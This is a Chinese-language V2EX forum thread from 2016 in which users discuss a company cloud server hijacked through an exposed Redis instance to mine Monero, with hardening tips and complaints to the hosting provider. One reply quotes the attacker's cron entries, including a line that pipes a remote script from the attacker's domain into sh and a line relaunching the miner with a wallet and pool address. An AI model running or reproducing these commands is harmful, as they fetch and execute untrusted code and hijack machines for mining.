首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Recommended Services
Amazon Web Services
LeanCloud
New Relic
ClearDB
华为云
V2EX  ›  云计算

今天发现公司的阿里云服务被黑了,被安装了 yam 来挖矿

  •  1
     
  •   wraith4 · 2016-06-20 11:41:19 +08:00 · 12516 次点击
    这是一个创建于 785 天前的主题,其中的信息可能已经有所发展或是发生改变。
    应该是利用 redis 漏洞入侵,加了定时任务,每 2 分钟请求 https://r.chanstring.com/api/report?pm=1 这个地址,脚本写的不错。执行挖矿程序后导致 cpu 和带宽 100%, kill 进程会自动重启。
    解决方案: http://www.cnblogs.com/red-code/p/5599393.html
    和这个有些差异,最后要修补redis漏洞。
    28 回复  |  直到 2016-07-01 11:55:02 +08:00
        1
    stanjia   2016-06-20 11:49:49 +08:00
    脚本写的不错! 发来看看 怎么写的
        2
    wraith4   2016-06-20 11:51:58 +08:00
    @stanjia 直接访问那个地址啊
        3
    stanjia   2016-06-20 11:54:10 +08:00
    @wraith4 哈哈哈哈哈
        4
    aprikyblue   2016-06-20 12:52:31 +08:00 via Android
    502 Bad Gateway
        5
    tomczhen   2016-06-20 12:58:22 +08:00 via iPhone
    所以说你们公司的 redis 可以公网访问?
        6
    realpg   2016-06-20 13:08:06 +08:00
    这个服务器是不是跑 jboss 的……笑……
        7
    fy   2016-06-20 13:11:06 +08:00
    所以脚本是怎么写的。。
        8
    iyangyuan   2016-06-20 13:11:14 +08:00
    redis 一般是放在内网的
        9
    coolloves   2016-06-20 13:15:48 +08:00
    放出来参考下吧
        10
    eoo   2016-06-20 14:01:07 +08:00 via Android
    shell
        11
    Jaylee   2016-06-20 14:19:18 +08:00
    redis 未授权访问的漏洞都这么长时间了还不修复。。。活该被黑啊
        12
    fcicq   2016-06-20 15:25:17 +08:00
    没勒索数据的就是良心黑客了, 赶紧偷笑去吧.
        13
    hard2reg   2016-06-20 16:19:39 +08:00   ♥ 1
    我只是想偷偷挖个矿。。。
        14
    Gua   2016-06-20 16:21:26 +08:00 via iPhone
    @hard2reg 还被发现了…
        15
    j4fun   2016-06-20 17:05:48 +08:00
    没有觉得写的多好啊、、、
        16
    vus520   2016-06-20 17:13:37 +08:00
    公司内网的测试机也这样被爆过,重要文件被打包加密然后删除了目录。
    要勒索 N 个比特币,我 TM 有这么多比特币还在这陪你玩?最后重装服务器搞定 。
        17
    ipconfiger   2016-06-20 17:13:47 +08:00
    1, 到手注入公钥后立马关掉密码登录
    2, 除了 http 外的所有服务都不要开公网访问
    能做到着两点的话, 基本安全无虞
        18
    notgod   2016-06-20 17:26:32 +08:00
    2 天前中招, r.chanstring.com 解析在 DO 的 IP
    在 digitalocean 投诉过 说处理 都 2 天了 这机器竟然还他妈在线
    https://i.niupic.com/images/2016/06/20/OBjiiQ.jpg

    会加 2 条定时任务

    */2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh
    */2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &


    官方回
    Hey there,

    Thank you for your response.

    Thank you for submitting your abuse complaint. One of our support engineers has picked it up and assigned it to the customer in question and it will be resolved as soon as possible.

    Looking forward to hearing from you if you have any other questions or require any further assistance.

    Thank you!
    Jeff Elliott
    Trust & Safety Specialist
    DigitalOcean Support

    然后就没下文了
        19
    notgod   2016-06-20 17:28:27 +08:00
    这个国人干的事
    登录 IP 是阿里云的
        20
    glogo   2016-06-20 17:31:32 +08:00
    redis 居然可以公网访问....
        21
    jugelizi   2016-06-20 17:56:38 +08:00
    开源软件默认不加口令害死人啊
    即便开放在内网也不安全的
        22
    wraith4   2016-06-20 21:17:18 +08:00
    这是公司的外网测试环境,小公司,没有专业运维人员。
        23
    Flygoat   2016-06-20 22:39:01 +08:00 via Android
    唉我前段时间被搞的那只 Server 给人装了 BOINC,这是不是业界良心啊。
        24
    incompatible   2016-06-20 23:23:10 +08:00
    redis 漏洞本身不致命,用 root 账户登录服务器并启动程序才是致命的。
        25
    strahe   2016-06-20 23:27:48 +08:00
    几层楼以上的,怎么还怪起开源软件的默认配置了,实际上都应该自己好好配置下的,只是大部分人都忽略了.
        26
    hanxiV2EX   2016-06-20 23:32:53 +08:00 via iPhone
    竟然用 root 账户启动 redis
        27
    franklinyu   2016-06-22 13:13:48 +08:00
    總之是自己作死,不怪人家 Redis
        28
    michael2016   2016-07-01 11:55:02 +08:00
    插播广告:专业接安全运维的活儿,有兴趣的私聊哈!
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   鸣谢   ·   实用小工具   ·   1995 人在线   最高记录 3762   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.1 · 21ms · UTC 15:19 · PVG 23:19 · LAX 08:19 · JFK 11:19
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1